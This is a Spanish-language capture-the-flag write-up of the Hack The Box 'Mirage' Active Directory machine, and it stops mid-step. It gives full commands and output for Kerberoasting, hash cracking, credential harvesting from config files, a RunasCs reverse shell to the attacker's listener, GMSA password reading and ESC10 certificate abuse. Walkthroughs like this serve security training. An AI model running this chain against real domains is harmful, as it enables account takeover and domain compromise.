  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/24/25 - Ronnie Flathers @ropnop

2025/07/24 17:08:29 >  Using KDC(s):
2025/07/24 17:08:29 >  	dc01.mirage.htb:88

2025/07/24 17:08:29 >  [+] VALID USERNAME:	Dev_Account_A@mirage.htb
2025/07/24 17:08:29 >  [+] VALID USERNAME:	Dev_Account_B@mirage.htb
2025/07/24 17:08:30 >  [+] VALID USERNAME:	david.jjackson@mirage.htb
2025/07/24 17:08:30 >  Done! Tested 11 usernames (3 valid) in 0.506 seconds
❯

Este usuario tiene acceso por smb y ldap.

1
2
3
4
5
6
7


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec smb dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
❯

bloodhound

Ejecutamos el collector de bloodhound con netexec.

1
2
3
4
5
6
7
8


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --dns-server 10.10.11.78 --bloodhound -c All
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
LDAP        dc01.mirage.htb 389    DC01             Resolved collection methods: psremote, localadmin, session, dcom, acl, trusts, rdp, group, container, objectprops
LDAP        dc01.mirage.htb 389    DC01             Using kerberos auth without ccache, getting TGT
LDAP        dc01.mirage.htb 389    DC01             Done in 00M 52S
LDAP        dc01.mirage.htb 389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_dc01.mirage.htb_2025-07-25_002539_bloodhound.zip
❯

Users

Encontramos nueve cuentas dentro del grupo Domain Users.

Nathan.Aadam

Nathan puede acceder por WinRM ademas, pertenece a dos grupos: Exchange_admins y IT_Admins.

Tambien, se observa que es posible realizar Kerberoasting a este usuario.

Mark.Bbond

Mark a traves del grupo IT_Support puede realizar el cambio de contrasena a Javier.Mmarshall.

Javier.Mmarshall

Javier puede realizar la lectura de contrasena GMSA de Mirage-Service$.

Mirage-Service

Se muestra como miembro unico de Domain Computers.

User - nathan.aadam

A traves de las credenciales de david.jjackson ejecutamos kerberoasting con netexec logrando obtener el hash de nathan.aadam.

1
2
3
4
5
6
7
8


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --kerberoasting output.txt
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
LDAP        dc01.mirage.htb 389    DC01             [*] Skipping disabled account: krbtgt
LDAP        dc01.mirage.htb 389    DC01             [*] Total of records returned 1
LDAP        dc01.mirage.htb 389    DC01             [*] sAMAccountName: nathan.aadam, memberOf: ['CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb', 'CN=IT_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb'], pwdLastSet: 2025-06-23 15:18:18.584667, lastLogon: 2025-07-04 14:01:43.511763
LDAP        dc01.mirage.htb 389    DC01             $krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb\nathan.aadam*$fdbc195b7cfcf804745fd0b61246e594$94cc62c7c6a257289c128b28284d27d8dc0f2339f7c3a06efc3b77431c8ba477f35a067169b98e57bf1cf42195896c2e50471e48f3f1985125eb96ac28650f131de0390aa84b5c50935d6d3c1b342f8ffbbc743e24aceb6e6cce74227525d907b518a0909637bbeaefb5369bc6bed7b5dece94bb61bef1eea2858d9ceeb0a2e493016df8e3bec5ba8ace5a9325c39e24d7f495114d9e08f74e1b4387fd72aff0f82a2386159208d81ef8917d33fbc3e7f5f6ce671e0980b68c207fdaa706ba1d8693e8a22cdc533fe7d82fd17a48c1189c0414a9758ae809ca99a57713f90d836b32519a25b151547568a174a57fcbe4dfe1865b12607a6413042c4103976ea12f3e3f0c400950a5d91e935f06c19dc32ba9837dce497a52ae167409cc22542392fc338584ec1cecdc3814be5d881a986bd6551583a42a98295656275788a3e778a89801d48613b24aebfad930fc8ce8bb279b412e4139e7da297b848bb876261b93751900c69932917e436731c545d58dc7ef2da47f88596b04350875274800954851688ce2ff3a288c0f7a959296a0ae9f19443b1da5e931ba40f2c18ebc5447a4609680171dc28f51000e8400276826380a5a39614c69c0da47e546bb84531924b42994243f4e0da59495fdb8074411a3a9ac75c999b1ff4bcaf82126aaa686c8b05539344f04cd236994e347c495dd96cb94d063de35e080b755e58adee621cce5d96639867a77ee29ce80c87ff718888a49166296d9aa7b4a6f23a1be72b73e5dbdb23b3f53820aeb2c52cbfce6ff945be6a4c1e5e16dde6d8565a29a8717582dd7a90c2da8766cd3f1b5716237d9c9d3dbf37781aff8a4833911bf0775f1e067761db0ec13a96d9954b084a0abd7bda6f2b2ff5eba7ec4c24506261c96e8ce70cf8c82a9174860b5be53e2993ce601ded0c4c56fec869014447640bccefc98ad6959db063f7af8027a9e4cc529201c8d29fdbca0432df69c7ef09e2803272f73383c813322ec050c12704e4095ea25d1b198ea474badc079785a67d549a3bfb2d777a0465061a5434f3d2c60bf74ac91b63d2f2cb430f5a5354607ecef15a7bbb7b88b4d16740ef6d47e6bdd1d41f6278078b81dd050d9c71838b1d491f53c3509010c23c7b64881abb138c4b651017ad1e02d145b6602c6575f77b7d5d78af27bc2fd6e7d7b02fa6ca746d6feced77d3feb5c6cc838a193f1e9bcad7abf1fb936bc621ab1d6b3c280b5d366fb83dbd9ecfca641b5742faee9bb74af3986f9f6b165d11ea214156a09a10b0fa71650f1fa20047f465dad36f7cee305f8e1f71b2269949d6653ac009e4fd63f446952c2580cb953a3171e9f332ee5ac28d22cd4d71094f7d0891714fd10d5100ec99319f34b2db36297a03a4ffece43325ed5189638e1987bf1ed37c0bcb2a79309e3ebaabbf2c7513bdb3dfe496ce380b9a5f09024352a63d37a69ad54c1f19c9066bf0cf5666c755f534b2b75c766a508ddd93e0940efc097145f2aec40e5635ce7efe5eaad349f6281cb21e7153721ea436601e5b2615d6e3fae76e81d76201c823b0fa2673e995e
❯

Cracking the Hash

Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash logrando obtener la contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


❯ john output.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3edc#EDC3        (?)     
1g 0:00:00:04 DONE (2025-07-24 17:20) 0.2331g/s 2906Kp/s 2906Kc/s 2906KC/s 3er733..3ddfiebw
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
❯ 

Nathan tiene acceso por smb y ldap.

1
2
3
4
5
6
7


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u nathan.aadam -p '3edc#EDC3' -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\nathan.aadam:3edc#EDC3 
❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec smb dc01.mirage.htb -u nathan.aadam -p '3edc#EDC3' -k
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\nathan.aadam:3edc#EDC3 
❯

Shell WinRM

Nathan al pertenecer al grupo de Remote Managment Users puede acceder por WinRM. Generamos el archivo de configuracion krb5 con netexec para mirage.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u nathan.aadam -p '3edc#EDC3' -k --generate-krb5-file file.conf
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\nathan.aadam:3edc#EDC3 
❯ cat file.conf

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = MIRAGE.HTB

[realms]
    MIRAGE.HTB = {
        kdc = dc01.mirage.htb
        admin_server = dc01.mirage.htb
        default_domain = mirage.htb
    }

[domain_realm]
    .mirage.htb = MIRAGE.HTB
    mirage.htb = MIRAGE.HTB
❯ 
❯ sudo cp file.conf /etc/krb5.conf
❯

Solicitamos un ticket con kinit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


❯ kinit nathan.aadam
Password for nathan.aadam@MIRAGE.HTB: 
❯ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: nathan.aadam@MIRAGE.HTB

Valid starting       Expires              Service principal
07/25/2025 00:23:05  07/25/2025 10:23:05  krbtgt/MIRAGE.HTB@MIRAGE.HTB
    renew until 07/26/2025 00:23:03
07/25/2025 00:23:09  07/25/2025 10:23:05  HTTP/DC01.MIRAGE.HTB@MIRAGE.HTB
    renew until 07/26/2025 00:23:03
❯

Ejecutamos evil-winrm logrando una shell y la lectura de la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


❯ evil-winrm -i DC01.MIRAGE.HTB -r MIRAGE.HTB
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> whoami
mirage\nathan.aadam
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> dir ../Desktop


    Directory: C:\Users\nathan.aadam\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          7/4/2025   1:01 PM           2312 Microsoft Edge.lnk
-ar---         7/24/2025   9:31 PM             34 user.txt


*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> cat ../Desktop/user.txt
56c86aae2dee7b7b9e3e4e0ccc1cbe79
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

En la configuracion de nats enocntramos otras credenciales para usuarios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


*Evil-WinRM* PS C:\> cat "Program Files/Nats-Server/nats-server.conf"
listen: '0.0.0.0:4222'

jetstream: {
  store_dir: 'C:\Program Files\Nats-Server\tmp'
}

accounts: {
  '$SYS': {
    users: [
      { user: 'sysadmin', password: 'bb5M0k5XWIGD' }
    ]
  },

  'dev': {
    jetstream: true,
    users: [
      { user: 'Dev_Account_A', password: 'hx5h7F5554fP@1337!' },
      { user: 'Dev_Account_B', password: 'tvPFGAzdsJfHzbRJ' }
    ]
  }
}
*Evil-WinRM* PS C:\>

User - Mark.bbond -> javier.Mmarshall

Tras ejecutar WinPEAS este muestra un par de credenciales.

1
2
3
4
5


ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  MIRAGE
    DefaultUserName               :  mark.bbond
    DefaultPassword               :  1day@atime

Estas permiten el acceso por smb y ldap.

1
2
3
4
5
6
7


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec smb dc01.mirage.htb -u mark.bbond -p 1day@atime  -k
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\mark.bbond:1day@atime 
❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u mark.bbond -p 1day@atime  -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\mark.bbond:1day@atime 
❯

Generamos un ticket para este usuario con getTGT.

1
2
3
4
5


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.78 mirage.htb/mark.bbond:1day@atime
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in mark.bbond.ccache
❯

Change Password javier.mmarshall

A traves de IT_Supoort mark puede cambiar la contrasena de javier.

1
2
3


❯ KRB5CCNAME=mark.bbond.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" bloodyAD --host dc01.mirage.htb -d mirage.htb -u mark.bbond -k set password javier.mmarshall 5upperP@ss
[+] Password changed successfully!
❯

Muestra KDC_ERR_CLIENT_REVOKED que indica que el usuario no puede autenticarse.

1
2
3
4


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u javier.mmarshall -p 5upperP@ss -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [-] mirage.htb\javier.mmarshall:5upperP@ss KDC_ERR_CLIENT_REVOKED
❯

Si observamos el usuario no esta habilitado.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> Get-ADUser -Identity Javier.Mmarshall


DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Enabled           : False
GivenName         : javier.mmarshall
Name              : javier.mmarshall
ObjectClass       : user
ObjectGUID        : c52e731b-30c1-439c-a6b9-0c2f804e5f08
SamAccountName    : javier.mmarshall
SID               : S-1-5-21-2127163471-3824721834-2568365109-1108
Surname           :
UserPrincipalName : javier.mmarshall@mirage.htb



*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

Tambien, vemos que mark tiene permisos sobre javier.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


❯ KRB5CCNAME=mark.bbond.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)"  bloodyAD --host DC01.mirage.htb -u mark.bbond -k get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=mirage,DC=htb
permission: WRITE

distinguishedName: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
permission: WRITE

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
permission: WRITE
❯

Enable User

Iniciamos obteniendo una shell como mark.bbond con RunasCs.

1
2
3
4
5
6
7


*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> .\RunasCs.exe mark.bbond "1day@atime" powershell.exe -r 10.10.14.104:1335
[*] Warning: The logon for user 'mark.bbond' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-864204$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 1336 created in background.
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

Ejecutamos Enable-ADAccount y javier ahora muestra que esta habilitado.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


PS C:\Windows\system32> Enable-ADAccount -Identity javier.mmarshall
PS C:\Windows\system32> Get-ADUser -Identity javier.mmarshall
Get-ADUser -Identity javier.mmarshall


DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Enabled           : True
GivenName         : javier.mmarshall
Name              : javier.mmarshall
ObjectClass       : user
ObjectGUID        : c52e731b-30c1-439c-a6b9-0c2f804e5f08
SamAccountName    : javier.mmarshall
SID               : S-1-5-21-2127163471-3824721834-2568365109-1108
Surname           : 
UserPrincipalName : javier.mmarshall@mirage.htb



PS C:\Windows\system32>

Tras habilitar el usuario este nos sigue mostrando el mismo error.

1
2
3
4


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u javier.mmarshall -p 5upperP@ss -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [-] mirage.htb\javier.mmarshall:5upperP@ss KDC_ERR_CLIENT_REVOKED
❯

Intentamos a traves de RunasCs ahora muestra que el usuario tiene restriciones de tiempo para ingresar.

1
2
3


*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> .\RunasCs.exe javier.mmarshall 5upperP@ss "whoami"
[-] RunasCsException: LogonUser failed with error code: Your account has time restrictions that keep you from signing in right now
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

Logon Hours

Siguiendo el post How to set Logon Hours for Active Directory Users actualizamos el usuario javier.mmarshall a las horas que puede ingresar. Cambiamos las horas para el ingreso de este usuario.

1
2
3
4
5
6


# $logonHoursArray = [byte[]] (255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255)
# set-aduser javier.mmarshall -replace @{logonhours = $logonHoursArray}
PS C:\Windows\system32> $logonHoursArray = [byte[]] (0, 240, 127, 192, 255, 255, 255, 255, 255, 63, 248, 255, 192, 255, 255, 255, 255, 255, 63, 0, 0)
$logonHoursArray = [byte[]] (0, 240, 127, 192, 255, 255, 255, 255, 255, 63, 248, 255, 192, 255, 255, 255, 255, 255, 63, 0, 0)
PS C:\Windows\system32> set-aduser javier.mmarshall -replace @{logonhours = $logonHoursArray}
PS C:\Windows\system32>

RunasCS muestra que no es posible ingresar con este usuario.

1
2
3


*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> .\RunasCs.exe javier.mmarshall '5upperP@ss' whoami 
[-] RunasCsException: Selected logon type '2' is not granted to the user 'javier.mmarshall'. Use available logon type '3'.
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

Con la flag --remote-impersonation este logra una conexion pero muere al instante.

1
2
3
4
5
6
7


❯ rlwrap nc -lvp 1336
listening on [any] 1336 ...
connect to [10.10.15.85] from mirage.htb [10.10.11.78] 50788
❯ rlwrap nc -lvp 1336
listening on [any] 1336 ...
connect to [10.10.15.85] from mirage.htb [10.10.11.78] 50792
❯

netexec muestra que tiene acceso por LDAP.

1
2
3
4


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u javier.mmarshall -p 5upperP@ss -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\javier.mmarshall:5upperP@ss 
❯

User - Mirage-Service$

Read GMSA Password

Javier puede realizar la lectura de la contrasena gmsa de mirage-service$, ejecutamos netexec con la flag --gmsa con las credenciales de javier.

1
2
3
4
5
6


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u javier.mmarshall -p 5upperP@ss -k --gmsa
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAPS       dc01.mirage.htb 636    DC01             [+] mirage.htb\javier.mmarshall:5upperP@ss 
LDAPS       dc01.mirage.htb 636    DC01             [*] Getting GMSA Passwords
LDAPS       dc01.mirage.htb 636    DC01             Account: Mirage-Service$      NTLM: 305806d84f7c1be93a07aaf40f0c7866     PrincipalsAllowedToReadPassword: javier.mmarshall
❯

Privesc

Obtuvimos un ticket para mirage-service.

1
2
3
4
5


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.78 mirage.htb/mirage-service$ -hashes :305806d84f7c1be93a07aaf40f0c7866
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in mirage-service$.ccache
❯ 

Tras ejecutar certipy este no muestra ninguna plantilla vulnerable.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48


❯ KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad find -vulnerable -k -no-pass -dc-ip 10.10.11.78 -target dc01.mirage.htb -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'mirage-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'mirage-DC01-CA'
[*] Checking web enrollment for CA 'mirage-DC01-CA' @ 'dc01.mirage.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : mirage-DC01-CA
    DNS Name                            : dc01.mirage.htb
    Certificate Subject                 : CN=mirage-DC01-CA, DC=mirage, DC=htb
    Certificate Serial Number           : 1512EEC0308E13A146A0B5AD6AA741C9
    Certificate Validity Start          : 2025-07-04 19:58:25+00:00
    Certificate Validity End            : 2125-07-04 20:08:25+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : MIRAGE.HTB\Administrators
      Access Rights
        ManageCa                        : MIRAGE.HTB\Administrators
                                          MIRAGE.HTB\Domain Admins
                                          MIRAGE.HTB\Enterprise Admins
        ManageCertificates              : MIRAGE.HTB\Administrators
                                          MIRAGE.HTB\Domain Admins
                                          MIRAGE.HTB\Enterprise Admins
        Enroll                          : MIRAGE.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates
❯

Se observa que mirage-service tiene permisos WRITE sobre mark.bbond.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


❯ KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)"  /usr/bin/bloodyAD --host DC01.mirage.htb -u mirage-service$ -k get writable

distinguishedName: CN=TPM Devices,DC=mirage,DC=htb
permission: CREATE_CHILD

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=mirage,DC=htb
permission: WRITE

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
permission: WRITE

distinguishedName: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
permission: WRITE
❯

Indagamos mas en los atributos y observamos que userPrincipalName se lista como WRITE.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41


❯ KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" bloodyAD --host DC01.mirage.htb -u mirage-service$ -k get writable --detail

# [... cut ..]

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
manager: WRITE
mail: WRITE
msDS-HABSeniorityIndex: WRITE
msDS-PhoneticDisplayName: WRITE
msDS-PhoneticCompanyName: WRITE
msDS-PhoneticDepartment: WRITE
msDS-PhoneticLastName: WRITE
msDS-PhoneticFirstName: WRITE
msDS-SourceObjectDN: WRITE
msDS-AllowedToDelegateTo: WRITE
altSecurityIdentities: WRITE
servicePrincipalName: WRITE
userPrincipalName: WRITE
legacyExchangeDN: WRITE
otherMailbox: WRITE
showInAddressBook: WRITE
systemFlags: WRITE
division: WRITE
objectGUID: WRITE
name: WRITE
displayNamePrintable: WRITE
proxyAddresses: WRITE
company: WRITE
department: WRITE
co: WRITE
dn: WRITE
initials: WRITE
givenName: WRITE
description: WRITE
title: WRITE
ou: WRITE
o: WRITE
sn: WRITE
objectCategory: WRITE
cn: WRITE
objectClass: WRITE

ESC10

Certipy presenta distintos escenarios en la documentacion donde userPrincipalName es utilizado para abusar de plantillas vulnerables (ESCx). Sin embargo, la mayoria de estas se muestran en el output de certipy.

Uno de los escenarios es ESC10, el cual tiene como requisito la modificacion de UPN de un usuario (mark.bbond) y el valor 0x4 en el registro HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\, este ultimo se confirmo al realizar el query en el registro.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\ 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
    EventLogging    REG_DWORD    0x1
    CertificateMappingMethods    REG_DWORD    0x4

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\CipherSuites
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Hashes
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

Hay que mencionar que ESC10 no es posible detectar a traves de certipy ya que es necesario acceso privilegiado para acceder a los registros.

Certipy does not directly detect ESC10 by querying the Schannel CertificateMappingMethods registry key on Domain Controllers or other target servers, as this typically requires privileged access (like local administrator rights) to those servers’ registries.

Exploit

Iniciamos cambiando userPrincipalName de mark.bbond como mirage-service a DC01$.

1
2
3
4
5
6
7


❯ KRB5CCNAME='mirage-service$.ccache' faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad account update -user 'mark.bbond' -upn 'DC01$@mirage.htb' -u 'mirage-service$@mirage.htb' -k -no-pass -dc-ip 10.10.11.78 -target dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'mark.bbond':
    userPrincipalName                   : DC01$@mirage.htb
[*] Successfully updated 'mark.bbond'
❯

Como mark.bbond se obtiene un certificado de la plantilla User.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


❯ KRB5CCNAME=mark.bbond.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad req -k -dc-ip 10.10.11.78 -target dc01.mirage.htb -ca mirage-DC01-CA -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'DC01$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
❯

Se devuelve el valor original de UPN a mark.bbond.

1
2
3
4
5
6
7


❯ KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad account update -user 'mark.bbond' -upn 'mark.bbond@mirage.htb' -u 'mirage-service$@mirage.htb' -k -no-pass -dc-ip 10.10.11.78 -target dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'mark.bbond':
    userPrincipalName                   : mark.bbond@mirage.htb
[*] Successfully updated 'mark.bbond'
❯

Con el certificado obtenido autenticamos y obtenemos una “shell” ldap donde realizamos ejecutamos RBCD. Para ello: set_rbcd Target Controlled-Account.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'DC01$@mirage.htb'
